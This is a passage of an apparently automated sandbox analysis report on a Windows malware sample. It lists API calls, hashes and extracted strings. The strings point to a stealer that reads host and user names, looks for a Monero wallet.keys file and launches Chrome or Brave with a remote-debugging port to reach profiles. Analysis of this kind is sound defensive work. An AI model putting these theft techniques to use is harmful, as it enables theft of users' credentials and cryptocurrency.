                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 36dd01f4ac3a1a5450a46b6d091a443e2b94739358673796c91fd555c9c87b67
                                      • Instruction ID: 6357330905e7bbb11581a0aaf469279dc581f16b9abdc324f5fd7e6c69d67477
                                      • Opcode Fuzzy Hash: 36dd01f4ac3a1a5450a46b6d091a443e2b94739358673796c91fd555c9c87b67
                                      • Instruction Fuzzy Hash: 42F082B1A41318BBE7289AE4AC59FAEB7D8F709B55F300458F604E7280D5719E40DBA4
                                      Function 0138D064 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 9abd8c2d7bb2f0b6e9c8e67a02c874893718e9734146649928c20bc16c4acf09
                                      • Instruction ID: 38f7324f8b8469445316f3bf9ab1f7902c7b35e119ab9aab61860e051b6562d5
                                      • Opcode Fuzzy Hash: 9abd8c2d7bb2f0b6e9c8e67a02c874893718e9734146649928c20bc16c4acf09
                                      • Instruction Fuzzy Hash: 6E01B17640C708CFD302BFA9D88547EF7E9EFE8209F02C92DD6C283A14EA3164418A52
                                      Function 00F11190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F27A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27AA0
                                        • Part of subcall function 00F27A70: RtlAllocateHeap.NTDLL(00000000), ref: 00F27AA7
                                        • Part of subcall function 00F27A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00F27ABF
                                        • Part of subcall function 00F279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F111B7), ref: 00F27A10
                                        • Part of subcall function 00F279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F27A17
                                        • Part of subcall function 00F279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F27A2F
                                      • ExitProcess.KERNEL32 ref: 00F111C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 3550813701-0
                                      • Opcode ID: c22ddf63d0672824e2489c9080034cd558e1dd89cc833fd5b45aac162db992ea
                                      • Instruction ID: f99289bcd2039f1e0f0539830e2fe5bc02bf4861dbf1e160cc8252e09b1d74f1
                                      • Opcode Fuzzy Hash: c22ddf63d0672824e2489c9080034cd558e1dd89cc833fd5b45aac162db992ea
                                      • Instruction Fuzzy Hash: 01E017B5D0531167DA2877F4BC17B6B32CC6B6435AF000828FA1896146EE29E881A7A6

                                      Non-executed Functions

                                      Function 00F1BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00F30B32,00F30B2F,00000000,?,?,?,00F31450,00F30B2E), ref: 00F1BEC5
                                      • StrCmpCA.SHLWAPI(?,00F31454), ref: 00F1BF33
                                      • StrCmpCA.SHLWAPI(?,00F31458), ref: 00F1BF49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1C8A9
                                      • FindClose.KERNEL32(000000FF), ref: 00F1C8BB
                                      Strings
                                      • Google Chrome, xrefs: 00F1C6F8
                                      • Preferences, xrefs: 00F1C104
                                      • \Brave\Preferences, xrefs: 00F1C1C1
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00F1C534
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00F1C495
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00F1C3B2
                                      • Brave, xrefs: 00F1C0E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-1869280968
                                      • Opcode ID: 9115e0a0451433d6706e07e3cb88f268cb3e036c6706467f1c68f113985ecc49
                                      • Instruction ID: a841d80df775a904cf445ebf6394d60e29365f4008fdfaea8919baf42e16b206
                                      • Opcode Fuzzy Hash: 9115e0a0451433d6706e07e3cb88f268cb3e036c6706467f1c68f113985ecc49
                                      • Instruction Fuzzy Hash: 385229729501189BCB14FBB0ED66EEE737DAF94304F404599F50666081EF389B88DFA2
                                      Function 00F23B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00F23B1C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00F23B33
                                      • lstrcat.KERNEL32(?,?), ref: 00F23B85
                                      • StrCmpCA.SHLWAPI(?,00F30F58), ref: 00F23B97
                                      • StrCmpCA.SHLWAPI(?,00F30F5C), ref: 00F23BAD
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F23EB7
                                      • FindClose.KERNEL32(000000FF), ref: 00F23ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-2524465048
                                      • Opcode ID: ba2c78c4e6bd324619b0714530c173909e1e4c5d88d1c2bd12ee142fe3fd25db
                                      • Instruction ID: 500470575028964f085c13a8c5af1654c6205beef48aafb6a2a6a692500c0b97
                                      • Opcode Fuzzy Hash: ba2c78c4e6bd324619b0714530c173909e1e4c5d88d1c2bd12ee142fe3fd25db
                                      • Instruction Fuzzy Hash: C3A162B1A002189BDB34DFA4DC85FEE73B9BB84300F044598F61D9A185DB749B88DF92
                                      Function 00F24B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00F24B7C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00F24B93
                                      • StrCmpCA.SHLWAPI(?,00F30FC4), ref: 00F24BC1
                                      • StrCmpCA.SHLWAPI(?,00F30FC8), ref: 00F24BD7
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F24DCD
                                      • FindClose.KERNEL32(000000FF), ref: 00F24DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: 5fe69cef4055b3b5f774f315a86e6f13a2c022b115b08099062f8ba84ea14eec
                                      • Instruction ID: 7b6ed377449e1eb9f450d64fc9b0e561c0fba69f50e1f8607537f649efb88f0e
                                      • Opcode Fuzzy Hash: 5fe69cef4055b3b5f774f315a86e6f13a2c022b115b08099062f8ba84ea14eec
                                      • Instruction Fuzzy Hash: 1D613272900219ABDB34EBE0EC55FEA73BCBB48700F404598F61996184EB74EB84DF91
                                      Function 00F247C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F247D0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F247D7
                                      • wsprintfA.USER32 ref: 00F247F6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00F2480D
                                      • StrCmpCA.SHLWAPI(?,00F30FAC), ref: 00F2483B
                                      • StrCmpCA.SHLWAPI(?,00F30FB0), ref: 00F24851
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F248DB
                                      • FindClose.KERNEL32(000000FF), ref: 00F248F0
                                      • lstrcat.KERNEL32(?,01D8E9C8), ref: 00F24915
                                      • lstrcat.KERNEL32(?,01D8D9C0), ref: 00F24928
                                      • lstrlen.KERNEL32(?), ref: 00F24935
                                      • lstrlen.KERNEL32(?), ref: 00F24946
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 671575355-2848263008
                                      • Opcode ID: 4e83021593455fbffdb62c7ca3f5c0a64232242f0e59640560db91de35fba3a6
                                      • Instruction ID: f0e215ef60de0eed9a4c47e9c0132381386a6b7bb04ae70f666e2bc23e70b2c1
                                      • Opcode Fuzzy Hash: 4e83021593455fbffdb62c7ca3f5c0a64232242f0e59640560db91de35fba3a6
                                      • Instruction Fuzzy Hash: F55143B19002189BDB24EBF0DC99FE973BDAB58700F404598F61996184EB74EBC4DF91
                                      Function 00F240F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00F24113
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00F2412A
                                      • StrCmpCA.SHLWAPI(?,00F30F94), ref: 00F24158
                                      • StrCmpCA.SHLWAPI(?,00F30F98), ref: 00F2416E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F242BC
                                      • FindClose.KERNEL32(000000FF), ref: 00F242D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: 8226048f11d3ee66cfc6bcdb4cd2993250b5c7683301b33f3429f11ac7f3d3cc
                                      • Instruction ID: cf1858f5e357c6f8a94815999c694e8356829b5c333957eb91b675b17dc4868a
                                      • Opcode Fuzzy Hash: 8226048f11d3ee66cfc6bcdb4cd2993250b5c7683301b33f3429f11ac7f3d3cc
                                      • Instruction Fuzzy Hash: E05166B1900219ABDB24EBF0EC85EEA737CBB58300F404598F61996084DB75ABC5DF91
                                      Function 00F1EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00F1EE3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00F1EE55
                                      • StrCmpCA.SHLWAPI(?,00F31630), ref: 00F1EEAB
                                      • StrCmpCA.SHLWAPI(?,00F31634), ref: 00F1EEC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1F3AE
                                      • FindClose.KERNEL32(000000FF), ref: 00F1F3C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: 545d1afd87840bd0d9eafdf1dc0cc1c2eb483d51560983cb61241c16a8503415
                                      • Instruction ID: a04993f0ced5b0140884700c6c2b47a05f5840dcf66c40774e3f7a7687c5a623
                                      • Opcode Fuzzy Hash: 545d1afd87840bd0d9eafdf1dc0cc1c2eb483d51560983cb61241c16a8503415
                                      • Instruction Fuzzy Hash: 4CE110729111289BDB55FB60EC62EEE7339BF54310F4045E9B40A62092EF386F89DF52
                                      Function 00F50098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                      • API String ID: 0-1562099544
                                      • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction ID: ffcbcaf7f20ca6009c77d6dd40cd8ffe00504aa07545daa6a1ebc456bd7d8707
                                      • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction Fuzzy Hash: DDE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                      Function 00F1F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
